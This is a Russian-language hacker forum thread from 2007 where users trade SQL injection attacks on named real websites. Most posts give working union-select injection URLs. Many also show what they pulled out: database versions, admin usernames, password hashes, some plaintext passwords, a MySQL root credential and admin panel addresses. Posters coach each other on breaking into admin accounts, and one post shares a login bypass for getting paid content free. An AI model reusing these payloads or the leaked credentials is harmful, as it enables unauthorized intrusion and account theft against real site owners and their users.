SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. VERte][

    VERte][ Elder - Старейшина

    Joined:
    17 May 2007
    Messages:
    240
    Likes Received:
    163
    Reputations:
    32
    http://www.hardxxxniche.com/reg.html
    поле ввода кода:
    123' or '5'='5
    качаем на халяву))))))))))))

    http://www.xxx-sexi.com ещё один=)
    внизу первого сайта есть список рекомендумых сайтов, ходим по ним и ищем, что надо)))
     
    #3801 VERte][, 24 Nov 2007
    Last edited: 24 Nov 2007
    1 person likes this.
  2. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.zonewm.biz/showasf.php?id=4+union+select+1,version(),3,concat_ws(0x2F,id,pass),5,6,7,8,9+from+user/*
    version: 4.1.22-standard-log

    тока password т.к логины не подобрать

    7252112e9937463288df35cc14b2cf74
    4e8fed7ffd3b44ae492f8d306afff552
    7252112e9937463288df35cc14b2cf74
     
  3. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://axxl.ru/?module=do&part=full&id=-15976+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15/*
    Version : 4.1.21/db_axxler_4/[email protected]
     
  4. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.rating.vn.ua/stats.php?uid1=-489+union+select+1,version(),concat_ws(0x2F,id,name,password)+from+sites+limit+2,2/*
    Version :5.0.15-standard

    Типа что то связанное с админкой реклам...

    ID сайт пароль

    3/Сайт болельщиков ФК "Нива" Винница/hEaWFG
    1/Рейтинг винницких сайтов/ifhsuby
     
  5. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    www.seagullmag.com
    Американский журнал на русском языке «Чайка» (Seagull magazine)
    Code:
    http://www.seagullmag.com/article.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11+--+
    5.0.45:seagullmag@localhost:seagullmag
    Code:
    http://www.seagullmag.com/article.php?id=-1+union+select+1,concat(table_schema,0x3a,table_name),3,4,5,6,7,8,9,10,11+from+information_schema.columns+where+column_name=0x70617373776F7264+--+
    seagullmag_forum:ibf_forums
    Code:
    http://www.seagullmag.com/article.php?id=-1+union+select+1,column_name,3,4,5,6,7,8,9,10,11+from+information_schema.columns+where+table_schema=0x73656167756C6C6D61675F666F72756D+and+table_name=0x6962665F666F72756D73+limit+0,1+--+
    id
    name
    password
    Code:
    http://www.seagullmag.com/article.php?id=-1+union+select+1,concat_ws(0x3a,id,name,password,description),3,4,5,6,7,8,9,10,11+from+seagullmag_forum.ibf_forums+limit+1,1+--+
    Плюется чем-то очень страшным, вот пример первой записи:
    -81:"Чайка" #22(81) от 15 ноября 2006 г.:
    Пробовал так:
    Code:
    AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71)
    и так:
    Code:
    convert(paasword+using+latin1)
    Не помголо (
     
  6. Mike 007

    Mike 007 Elder - Старейшина

    Joined:
    4 Apr 2007
    Messages:
    58
    Likes Received:
    47
    Reputations:
    -4
    Code:
    http://www.polimernm.ru/partner.php?pid=-1+union+select+1,pass,user(),6,5+from+login/*
    я в этом деле новичок :D
    для чего выкладывают [email protected] и что оно даёт?
    Что делать дальше? как узнать пароль\хеш админа? или юзверя какого нибудь? :confused: :confused: :confused:
     
  7. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    ZAMUT
    Это utf8. Пробуй convert(something+using+utf8)
     
    1 person likes this.
  8. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Code:
    http://www.aiim.org/standards.asp?id=1+or+1=(SELECT+TOP+1+Email+FROM+vwWebUsers+WHERE+id='1')--
    В качестве логина используется мыло, пароли в колонке PWD, далее увеличивая id перебираем всех пользователей
     
    2 people like this.
  9. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    www.khemer.com Fun Online Games
    Code:
    http://www.khemer.com/index.php?action=category&id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5+--+
    4.1.22-standard:khemer_fuHack@localhost:khemer_khmerdb

    Code:
    http://www.khemer.com/index.php?action=category&id=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+users+limit+0,1+--+&page=0&ppage=20&order2=game_name&sby=ASC
    Всего одна запись, как ни странно админ =) хэш сбручен.
    Code:
    toby:d85bf20bfaa9f65a051daa8d1c7214af:pehyuen
    Авторизоваться тут:

    Code:
    http://www.khemer.com/login.php
     
  10. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Code:
    http://www.worstpreviews.com/review.php?id=-168+union+select+version(),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*
    Code:
    http://dvd.themanroom.com/dvd-review.php?id=-450+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/*
    Code:
    http://www.fremontcountyinfo.com/review.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,concat_ws(0x3a,userid,username,password),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5+from+user/*
    попробуйте до админа добраться
     
  11. 5taY3r

    5taY3r Elder - Старейшина

    Joined:
    10 May 2007
    Messages:
    38
    Likes Received:
    35
    Reputations:
    0
    Поможем Mike 007-му...)
    Code:
    http://www.polimernm.ru/partner.php?pid=-1+union+select+1,concat_ws(0x3a,id,user,pass,mail),3,4,5+from+login+limit+1,1/*
    Админка (зайти на смог)
    Code:
    http://www.polimernm.ru/admin/index.php
     
  12. sssssssssssq

    sssssssssssq Banned

    Joined:
    8 Aug 2005
    Messages:
    669
    Likes Received:
    426
    Reputations:
    335
    Code:
    http://www.albarakat.ru/pubs.php?id_pubs=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*
    Ищите админку и имена таблиц с колонками.
     
    2 people like this.
  13. Mike 007

    Mike 007 Elder - Старейшина

    Joined:
    4 Apr 2007
    Messages:
    58
    Likes Received:
    47
    Reputations:
    -4
    5taY3r
    спасибо за помощь :D
     
  14. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.imageland-pharma.ru/news.php?id=-1'+union+select+aes_decrypt(aes_encrypt(version(),0x71),0x71),2,3,4,5/*&sdate=2001-07-19&pdate=2007-10-30&i=0&mode=full
    4.1.11
    Code:
    http://www.imageland-pharma.ru/news.php?id=-1'+union+select+concat(id,0x3a,name,0x3a,password,0x3a,email),2,3,4,5+from+users/*&sdate=2001-07-19&pdate=2007-10-30&i=0&mode=full
    1:admin:RytGjKKh: попробуйте найти админку
     
  15. Mike 007

    Mike 007 Elder - Старейшина

    Joined:
    4 Apr 2007
    Messages:
    58
    Likes Received:
    47
    Reputations:
    -4
    http://www.macidol.com/review.php?id=-1+union+select+1,user(),database(),4,5,6,7,8,9,10/*
     
  16. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    хэш админа форума
    Code:
    -1+union+select+1,2,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),4,5,6,7,8,9,10+from+phpbb_users+limit+1,1/*
    хэши, где длина колонки с icq равна 6 символам
    Code:
    -1+union+select+1,2,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),4,5,6,7,8,9,10+from+phpbb_users+where+length(user_icq)=6+limit+1,1/*
    Пример: mixedance2002:56e48939372812b306938bc0f4be770a:[email protected]:442459
     
    3 people like this.
  17. Mike 007

    Mike 007 Elder - Старейшина

    Joined:
    4 Apr 2007
    Messages:
    58
    Likes Received:
    47
    Reputations:
    -4
    Code:
    http://www.iks-navigator.ru/review.php?id=-1+union+select+1,concat(password,0x3a,user)+from+mysql.user/*
    7cfc33b574d442f6:root:gfhjkm
    вопрос: как залогиниться?/
     
  18. Mike 007

    Mike 007 Elder - Старейшина

    Joined:
    4 Apr 2007
    Messages:
    58
    Likes Received:
    47
    Reputations:
    -4
    http://www.vdumu.net/review.php?id=-1'
    :D
    http://www.koln.ru/see.php?id=-265+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
     
    #3818 Mike 007, 24 Nov 2007
    Last edited: 24 Nov 2007
    1 person likes this.
  19. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Мальдивы

    www.visitmaldives.com

    Code:
    http://www.visitmaldives.com/ru/FAQ/faq.php?Id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5+--+  
    4.1.22-max-log:[email protected]:vmaldives

    Code:
    http://www.visitmaldives.com/ru/FAQ/faq.php?Id=-1+union+select+1,2,concat_ws(0x3a,name,password),4,5+from+users+limit+0,1+--+
    MTPB:mtp307
     
  20. -MoLoToK-

    -MoLoToK- Elder - Старейшина

    Joined:
    4 Oct 2007
    Messages:
    30
    Likes Received:
    23
    Reputations:
    3
    Ayda.ru

    скуля
    Code:
    http://www.ayda.ru/stories/show_u.php?u=999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
    login и pass админа
    Code:
    http://www.ayda.ru/stories/show_u.php?u=999999+union+select+1,2,3,4,5,concat(login,0x3a,psw),7,8,9,10,11,12,13,14,15,16+from+mkj_admin/*
    login и пасс походу от сайта advalue.ru так как на одном хосте
    Code:
    http://www.ayda.ru/stories/show_u.php?u=999999+union+select+1,2,3,4,5,concat(login,0x3a,password),7,8,9,10,11,12,13,14,15,16+from+users/*
     
    #3820 -MoLoToK-, 25 Nov 2007
    Last edited: 25 Nov 2007
Thread Status:
Not open for further replies.